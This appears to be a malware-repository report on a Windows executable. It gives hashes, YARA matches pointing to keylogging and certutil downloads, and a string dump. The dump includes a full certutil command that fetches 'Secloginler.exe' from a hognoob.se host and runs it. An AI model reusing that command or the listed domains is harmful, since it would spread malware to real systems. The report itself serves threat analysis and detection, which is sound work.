Sample details: 40f389f9831210976746f2ef6cfc6c25 --

Hashes
MD5: 40f389f9831210976746f2ef6cfc6c25
SHA1: 9b48e42db9ccb47091ecc514755328f08c4c9c4e
SHA256: d29aa1c873c01cd6b2da98937efc3bb567f9bd08dc400697e3df7b999895579c
SSDEEP: 3072:58qPv4wHDK8vA9BFk/PBOzERcJR5lfrlwYoarBUaotJYtg0Mu3jY+EL3Y8HOS6U:WqPv48NvCkEgC5fok7g+8H+
Details
File Type: PE32
Added: 2019-05-29 17:22:19
Yara Hits
YRP/Armadillo_v171 | YRP/Microsoft_Visual_Cpp_v60 | YRP/Microsoft_Visual_Cpp_v50v60_MFC_additional | YRP/Microsoft_Visual_Cpp_50 | YRP/Microsoft_Visual_Cpp_v50v60_MFC | YRP/Armadillo_v171_additional | YRP/Armadillo_v4x | YRP/Microsoft_Visual_Cpp | YRP/IsPE32 | YRP/IsWindowsGUI | YRP/HasRichSignature | YRP/without_images | YRP/without_attachments | YRP/with_urls | YRP/domain | YRP/url | YRP/contentis_base64 | YRP/Misc_Suspicious_Strings | YRP/network_http | YRP/screenshot | YRP/keylogger | YRP/win_registry | YRP/win_private_profile | YRP/win_files_operation | YRP/win_hook | YRP/BASE64_table | YRP/Str_Win32_Winsock2_Library | YRP/Str_Win32_Wininet_Library | YRP/Str_Win32_Internet_API | YRP/Str_Win32_Http_API | FlorianRoth/Certutil_Decode_OR_Download |
Parent Files
02cbdf7d741381ea32dde2dfd5844652
Strings
		!This program cannot be run in DOS mode.
`.rdata
@.data
RPWWWj
t'9|$pt
t@_^]3
D$,WPQR
L$<RPQ
D$XQRP
BRPj+S
@PVj,S
\$4t|Ht@H
T$ QRP
O h0wD
F$@;F(v
F$@@;F(v
QQSVWj
QQSVWd
t.;t$$t(
uRFGHt
tn<%t2
HHtiHtGH
HtHHt(
HtOHt)H
SS@SSPVSS
t#SSUP
t$$VSS
_^][YY
VC20XC00U
HHtpHHtl
sO;>|C;~
"WWShx
PPPPPPPP
QQSVWj
>:uNFV
>:u#FV
PPPPPPPP
PPPPPPPP
VWuBh4
HSVHWtgHHtF
+ttHHtd
t/WWUPj
QQSVW3
nt2Ht#Ht
QSUVWj
n0SSSSU
_SSSSU
Ph_^][Y
tD9_Pt?
(wqt\HHtS
t>Ht Ht
hWj@_;
tBSh5eA
t	9p$u
tBSh5eA
^$_^[]
F(_+F$^[;E
tBSh5eA
tBSh5eA
<A|2<Z
<A|@<Z
VWtp9E
HtTHtFHt8Ht*Ht
PWVWWW
SVWhyyA
9^0u/j
F09^4u*j
F49^8u&j
^,_^][
CWinApp
PreviewPages
Settings
CWinThread
CCmdTarget
CNotSupportedException
CMemoryException
CException
UNLINK
DELETE
CObject
CStringArray
combobox
software
CTempGdiObject
CTempDC
CGdiObject
CUserException
CResourceException
CTempWnd
AfxOldWndProc423
AfxWnd42s
AfxControlBar42s
AfxMDIFrame42s
AfxFrameOrView42s
AfxOleControl42s
GetMonitorInfoA
EnumDisplayMonitors
MonitorFromPoint
MonitorFromRect
MonitorFromWindow
GetSystemMetrics
USER32
DISPLAY
commctrl_DragListMsg
InitCommonControlsEx
COMCTL32.DLL
CPtrList
CMapPtrToPtr
CSyncObject
CCriticalSection
CArchiveException
CTempMenu
H:mm:ss
dddd, MMMM dd, yyyy
M/d/yy
December
November
October
September
August
February
January
Saturday
Friday
Thursday
Wednesday
Tuesday
Monday
Sunday
__GLOBAL_HEAP_SELECTED
__MSVCRT_HEAP_SELECT
runtime error 
TLOSS error
SING error
DOMAIN error
- unable to initialize heap
- not enough space for lowio initialization
- not enough space for stdio initialization
- pure virtual function call
- not enough space for _onexit/atexit table
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
- not enough space for thread data
abnormal program termination
- not enough space for environment
- not enough space for arguments
- floating point not loaded
Microsoft Visual C++ Runtime Library
Runtime Error!
Program: 
<program name unknown>
`h````
ppxxxx
(null)
GAIsProcessorFeaturePresent
KERNEL32
_hypot
SunMonTueWedThuFriSat
JanFebMarAprMayJunJulAugSepOctNovDec
GetLastActivePopup
GetActiveWindow
MessageBoxA
user32.dll
1#QNAN
1#SNAN
CreateDirectoryA
MoveFileA
GetProcessHeap
GetModuleHandleA
ExitProcess
HeapAlloc
HeapReAlloc
HeapFree
IsBadReadPtr
CloseHandle
WriteFile
CreateFileA
WaitForSingleObject
CreateProcessA
GetStartupInfoA
GetModuleFileNameA
GetTickCount
FindClose
FindNextFileA
DeleteFileA
RemoveDirectoryA
FindFirstFileA
GetCommandLineA
KERNEL32.DLL
MessageBoxA
wsprintfA
DispatchMessageA
TranslateMessage
GetMessageA
PeekMessageA
USER32.dll
GetObjectA
GetStockObject
GDI32.dll
LEAUT32.dll
PathFileExistsA
SHLWAPI.dll
lstrlenA
GetTempPathA
GetSystemDirectoryA
GetWindowsDirectoryA
GetVersionExA
GetLastError
GetCurrentProcess
MultiByteToWideChar
WideCharToMultiByte
GetTimeZoneInformation
SetLastError
GetCurrentThreadId
GetCurrentThread
lstrcmpiA
lstrcmpA
GlobalDeleteAtom
GlobalAlloc
GlobalLock
InterlockedIncrement
InterlockedDecrement
GlobalUnlock
FreeLibrary
LocalFree
lstrcpynA
EnterCriticalSection
lstrcpyA
LocalAlloc
LoadLibraryA
InitializeCriticalSection
DeleteCriticalSection
LeaveCriticalSection
SetFilePointer
FlushFileBuffers
GetProcAddress
TlsAlloc
GlobalFree
GlobalHandle
TlsFree
GlobalReAlloc
TlsSetValue
LocalReAlloc
TlsGetValue
GlobalFlags
WritePrivateProfileStringA
lstrcatA
GlobalFindAtomA
GlobalAddAtomA
GlobalGetAtomNameA
GetVersion
GetProcessVersion
SetErrorMode
GetCPInfo
GetOEMCP
RtlUnwind
TerminateProcess
RaiseException
GetSystemTime
GetLocalTime
GetACP
HeapSize
SetStdHandle
GetFileType
UnhandledExceptionFilter
FreeEnvironmentStringsA
FreeEnvironmentStringsW
GetEnvironmentStrings
GetEnvironmentStringsW
SetHandleCount
GetStdHandle
GetEnvironmentVariableA
HeapDestroy
HeapCreate
VirtualFree
VirtualAlloc
IsBadWritePtr
LCMapStringA
LCMapStringW
SetUnhandledExceptionFilter
GetStringTypeA
GetStringTypeW
IsBadCodePtr
CompareStringA
CompareStringW
SetEnvironmentVariableA
EnableWindow
GetParent
IsWindowEnabled
GetForegroundWindow
GetActiveWindow
SetForegroundWindow
SetWindowTextA
PostQuitMessage
PostMessageA
SendMessageA
SetCursor
GetWindowLongA
GetLastActivePopup
SetWindowsHookExA
GetCursorPos
IsWindowVisible
ValidateRect
CallNextHookEx
GetKeyState
GetNextDlgTabItem
GetFocus
EnableMenuItem
CheckMenuItem
SetMenuItemBitmaps
ModifyMenuA
GetMenuState
LoadBitmapA
GetMenuCheckMarkDimensions
GetWindowTextA
GetSystemMetrics
GetClassNameA
PtInRect
GetWindowRect
GetDlgCtrlID
GetWindow
ClientToScreen
UnhookWindowsHookEx
GetMenuItemCount
ReleaseDC
TabbedTextOutA
DrawTextA
GrayStringA
GetDlgItem
SetWindowLongA
SetWindowPos
ShowWindow
SetFocus
GetWindowPlacement
IsIconic
SystemParametersInfoA
RegisterWindowMessageA
GetMessagePos
GetMessageTime
DefWindowProcA
RemovePropA
CallWindowProcA
GetPropA
SetPropA
GetClassLongA
CreateWindowExA
DestroyWindow
GetMenuItemID
GetSubMenu
GetMenu
RegisterClassA
GetClassInfoA
WinHelpA
GetCapture
GetTopWindow
CopyRect
GetClientRect
AdjustWindowRectEx
GetSysColor
MapWindowPoints
LoadIconA
LoadCursorA
GetSysColorBrush
LoadStringA
DestroyMenu
RegCloseKey
RegCreateKeyExA
RegOpenKeyExA
RegSetValueExA
ADVAPI32.dll
SHGetSpecialFolderPathA
SHELL32.dll
le32.dll
RasGetConnectStatusA
RasHangUpA
RASAPI32.dll
CreateBitmap
DeleteObject
DeleteDC
SaveDC
RestoreDC
SelectObject
SetBkColor
SetTextColor
SetMapMode
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
SetWindowExtEx
ScaleWindowExtEx
GetClipBox
GetDeviceCaps
PtVisible
RectVisible
TextOutA
ExtTextOutA
Escape
comdlg32.dll
ClosePrinter
DocumentPropertiesA
OpenPrinterA
WINSPOOL.DRV
COMCTL32.dll
WSOCK32.dll
InternetOpenA
InternetCloseHandle
InternetSetOptionA
InternetConnectA
InternetReadFile
HttpQueryInfoA
HttpSendRequestA
HttpOpenRequestA
InternetCrackUrlA
InternetCanonicalizeUrlA
WININET.dll
UnregisterClassA
WebKitSdk\2.7.62\
WebKitSdk\
ophgsf.exe
!This program cannot be run in DOS mode.
`.rdata
@.data
MFC42.DLL
__CxxFrameHandler
memcpy
_CxxThrowException
memset
MSVCRT.dll
__dllonexit
_onexit
??1type_info@@UAE@XZ
_XcptFilter
_acmdln
__getmainargs
_initterm
__setusermatherr
_adjust_fdiv
__p__commode
__p__fmode
__set_app_type
_except_handler3
_controlfp
CloseHandle
WriteFile
CreateFileA
GetProcAddress
LoadLibraryA
HeapAlloc
HeapReAlloc
GetProcessHeap
VirtualFree
FreeLibrary
VirtualAlloc
IsBadReadPtr
ExitProcess
GetModuleHandleA
GetStartupInfoA
KERNEL32.dll
EnableWindow
GetClassNameA
GetWindow
SetFocus
GetWindowLongA
USER32.dll
CreateHatchBrush
GDI32.dll
_stricmp
_setmbcp
CChildFrame
CMainFrame
NHOWHYM
[YLLOJ
))+$'s
))+$'s
.m4..v\+
+.++m5
+$'s96
E4m7.P
s/*+.s
7+++'V
+7+'Vp
+7+'VQ
!!+$mu
.+++++mu
.$$$$$mu
......$.
.m5n.mmB
!.'+mu
!.'+mu
$....V
6J766E
$$$$$mu
D$+'{U
+$'VVZ
J"6JG6J
$QHJEYR4HUU
$QHJEYR9RRO[
1LJUHRO[SUZ5F[VYLWU
RKJH[NA9
2O[YR4HUU
2O[YR+Q@U
2O[YR9RRO[
RKJHRUL9
7UJ*Q[S;OELJ
RKJH[YJ9
'HQJU4QRU
;HUYJU4QRU9
7UJ2O[YR*QMU
7UJ.HO[9ZZHUKK
2OYZ2QXHYHA9
4HUU2QXHYHA
.HO[UKK
.HO[UKK
;HUYJU*OORVURN
+LYNKVOJ
;ROKU6YLZRU
7UJ;EHHULJ.HO[UKK
7UJ-OZERU6YLZRU9
7ROXYR-UMOHA+JYJEK5F
7UJ$UHKQOL5F9
+UJ4QRU9JJHQXEJUK9
7UJ-OZERU4QRU,YMU9
7UJ2YKJ5HHOH
;ONA4QRU9
7UJ+AKJUM:QHU[JOHA9
6UYN9RRO[
7UJ.HO[UKK6UYN
$QHJEYR.HOJU[J
6UYN4HUU
+UJ5DULJ
'YQJ4OH+QLWRU/XPU[J
;HUYJU5DULJ9
RKJH[MNQ9
35(,52
GKNHQLJT9
;ROKU5DULJ2OW
;RUYH5DULJ2OW9
/NUL5DULJ2OW9
:URUJU+UHDQ[U
/NUL+UHDQ[U9
/NUL+;-YLYWUH9
+UJ+UHDQ[U+JYJEK
(UWQKJUH+UHDQ[U;JHR6YLZRUH9
+JYHJ+UHDQ[U;JHR:QKNYJ[VUH9
(UW;ROKU3UA
(UW+UJ$YREU5F9
(UW/NUL3UA5F9
;ROKU+UHDQ[U6YLZRU
(UW/NUL3UA9
+JYHJ+UHDQ[U9
%LRO[S+UHDQ[U:YJYXYKU
;VYLWU+UHDQ[U;OLTQW
2O[S+UHDQ[U:YJYXYKU
;HUYJU+UHDQ[U9
9:$9.1
>!9&.9&> 
MUM[NA
__;FF4HYMU6YLZRUH
MUMKUJ
>!9.9&1> 
MUM[MN
_;FF*VHOG5F[UNJQOL
KJHKJH
KJH[NA
KJHL[NA
KJHRUL
KJHH[VH
KJH[KNL
KJH[YJ
KJHL[MN
_UF[UNJ_VYLZRUH
HUYRRO[
_XUWQLJVHUYZUF
KJH[VH
-+$;(*
??	JANU_QLTO>>%95>& 
__ZRROLUFQJ
_OLUFQJ
_QLQJJUHM
MYRRO[
_YZPEKJ_TZQD
:QKYXRU*VHUYZ2QXHYHA;YRRK
_KJHENH
_KJHQ[MN
:RR-YQL
+VURRUF
9RRO[YJU
XETTUH
.REWQL-U
/NUL.HOFA
;ROKU.HOFA
+U+VEJZOGL.HQDQRUWU
+AKJUM
+U[EHQJA
9NNRQ[YJQOL
(UMYHS
+!+*5-";EHHULJ;OLJHOR+UJ"+UHDQ[UK"
'QL+JY
":UTYERJ
K"KVURR"ONUL"[OMMYLZ
9NNRQ[YJQOLK"QUFNROHU
UFU"KVURR"ONUL"[OMMYLZ
1LKJYRR*QMU
35(,52
7UJ*Q[S;OELJ
+AK4HUU+JHQLW
/RUYEJ
;O;HUYJU1LKJYL[U
;O%LQLQJQYRQ@U
;O1LQJQYRQ@U
(ELJQMU8HOSUHK
69(:'9(5":5+;(1.*1/,"+AKJUM";ULJHYR.HO[UKKOH"
'*+7UJ9[JQDU;OLKORU+UKKQOL1Z
SUHLUR
.HO[UKK
(JR7UJ,J$UHKQOL,EMXUHK
,DK8Y[SULKK
+/4*'9(5"-Q[HOKOTJ"'QLZOGK";EHHULJ$UHKQOL"(EL
:UK[HQNJQOL
+!+*5-";EHHULJ;OLJHOR+UJ"+UHDQ[UK"
1K8YZ(UYZ.JH
GQLQLUJ
;HUYJU.HO[UKK9K%KUH9
+UJ*OSUL1LTOHMYJQOL
:ENRQ[YJU*OSUL5F
/NUL.HO[UKK*OSUL
:URUJU+UHDQ[U
;VYLWU+UHDQ[U;OLTQW
;HUYJU+UHDQ[U9
;OLJHOR+UHDQ[U
)EUHA+UHDQ[U+JYJEK
;ROKU+UHDQ[U6YLZRU
+JYHJ+UHDQ[U9
/NUL+UHDQ[U9
/NUL+;-YLYWUH9
(UWQKJUH+UHDQ[U;JHR6YLZRUH9
+UJ+UHDQ[U+JYJEK
9:$9.1
WUJVOKJLYMU
WUJKO[SLYMU
KURU[J
'+91O[JR
KUJKO[SONJ
[ROKUKO[SUJ
[OLLU[J
WUJVOKJXALYMU
KO[SUJ
'+9;RUYLEN
'+9+JYHJEN
KJHKJH
MUMKUJ
MUM[NA
KJHRUL
KJH[MN
-+$;(*
5LEM'QLZOGK
+ULZ-UKKYWU9
1K'QLZOG$QKQXRU
-UKKYWU8OF9
5FQJ'QLZOGK5F
GKNHQLJT9
7UJ;EHHULJ.HO[UKK
-ODU4QRU5F9
-ODU4QRU9
7UJ+AKJUM:QHU[JOHA9
7UJ+AKJUM1LTO
5FNYLZ5LDQHOLMULJ+JHQLWK9
7UJ5FQJ;OZU.HO[UKK
7UJ$UHKQOL5F9
*UHMQLYJU*VHUYZ
+UJ5DULJ
;YL[UR1O
(UKUJ5DULJ
;HUYJU5DULJ9
7UJ4QRU9JJHQXEJUK9
'YQJ4OH+QLWRU/XPU[J
RKJH[YJ9
;ROKU6YLZRU
7UJ2YKJ5HHOH
(URUYKU-EJUF
;HUYJU-EJUF9
7UJ-OZERU4QRU,YMU9
;HUYJU.HO[UKK9
7UJ;EHHULJ*VHUYZ1Z
;ROKU:UKSJON
+UJ*VHUYZ:UKSJON
7UJ%KUH/XPU[J1LTOHMYJQOL9
7UJ*VHUYZ:UKSJON
/NUL:UKSJON9
1LJUHLUJ;ROKU6YLZRU
1LJUHLUJ(UYZ4QRU
1LJUHLUJ/NUL%HR9
1LJUHLUJ/NUL9
2OOSEN.HQDQRUWU$YREU9
9ZPEKJ*OSUL.HQDQRUWUK
.HO[UKK
.HO[UKK
;HUYJU*OORVURN
+LYNKVOJ
(UW;ROKU3UA
(UW5LEM3UA5F9
(UW5LEM$YREU9
(UW/NUL3UA5F9
(UW)EUHA$YREU5F9
(UW:URUJU$YREU9
(UW:URUJU3UA9
(UW+UJ$YREU5F9
(UW;HUYJU3UA5F9
?9$JANU_QLTO>>
=>=5=^=S=}=
?>?!?V?O?q?j?c?
=<=7=,= =_=U=R=~=
<><4<2<)<!<[<M<G<y<m<a<
?9?7?,?#?U?S?B?x?q?
	C	z	h	
=4=+=^=M=@=w=j=
<=<6<&<V<F<v<f<
?6?&?V?F?v?f?
	6	V	@	t	d	
=$="=X=O=B=
~	n	j	f	
Shellex
haq.hognoob.se
Rstuvw
Rstuvw Yabcdefg Ijklmnop Rstu
Rstuvwxy Bcdefghij Lmnopqr Tuvwxyab Def
Default
HeapFree
kernel32.dll
HeapFree
KERNEL32.dll
VirtualFree
kernel32.dll
VirtualProtect
kernel32.dll
Local AppWizard-Generated Applications
CWzdDoc
CWzdView
.?AVtype_info@@
wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww
wwtGwwwwwwwwwwwwwwwtDDDDw
wwGtwDwwwwwtDDDDw
pwwwwppwwww
wwGttwGwwwwt
33330wp3
wwGttwGwwwwt
wwtDtwGwp
33330p333333
wwwttDwwp
wwwwpppwww
wwp0wwww
wwp0wwww
OGp888888
wwp0wwww
wwwppwwwp
p0wwww
DDGwp8
wwwwwwww
p0wwww
wwwwwwpwppp0wwww
wwwwwww
wwwwwww
wwwwwp
Secloginler.exe
http://fid.hognoob.se/Secloginler.exe
cmd.exe /c certutil.exe -urlcache -split -f http://fid.hognoob.se/Secloginler.exe %SystemRoot%\Temp\Secloginler.exe & %SystemRoot%\Temp\Secloginler.exe
\....\
\....\TemporaryFile
\TemporaryFile
kernel32.dll
CreateDirectoryA
MoveFileA
program internal error number is %d. 
:%d,%d(
blackmoon
BlackMoon RunTime Error:
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
.PAVCException@@
Accept: */*
Accept: */* 
HTTP/1.0
gb2312
us-ascii
=?gb2312?B?
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
%s <%s>
Content-Transfer-Encoding: base64
MIME-Version: 1.0
Content-type: text/plain; charset="
MIME-Version: 1.0
Content-type: multipart/mixed; boundary="#BOUNDARY#"
Reply-To: %s
From: %s
To: %s
Subject: %s
Date: %s
From: %s
To: %s
Cc: %s
Subject: %s
Date: %s
%a, %d %b %Y %H:%M:%S 
%+.2d%.2d
.?AVCNoTrackObject@@
.?AV_AFX_WIN_STATE@@
.?AVCObject@@
.?AVCCmdTarget@@
.?AVCWinThread@@
.?AVCWinApp@@
.PAVCException@@
.?AV_AFX_CTL3D_STATE@@
.?AV_AFX_CTL3D_THREAD@@
.?AVCCmdUI@@
.?AV_AFX_SOCK_STATE@@
.?AVCWnd@@
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCException@@
.?AVCSimpleException@@
.?AVCMemoryException@@
.?AVCNotSupportedException@@
.?AVCSyncObject@@
.?AVCCriticalSection@@
.?AVCMapPtrToPtr@@
.?AVCSessionMapPtrToPtr@@
.?AVCStringArray@@
.PAVCArchiveException@@
.?AUCThreadData@@
.?AV_AFX_THREAD_STATE@@
.?AVAFX_MODULE_STATE@@
.?AVAFX_MODULE_THREAD_STATE@@
.?AV_AFX_BASE_MODULE_STATE@@
.?AVCDC@@
.?AVCGdiObject@@
.?AVCTempDC@@
.?AVCTempGdiObject@@
.?AVCResourceException@@
.?AVCUserException@@
.?AVCTestCmdUI@@
.?AVCTempWnd@@
.?AVCHandleMap@@
.?AVCPtrList@@
.?AVCArchiveException@@
.?AVCMenu@@
.?AVCTempMenu@@
.?AVtype_info@@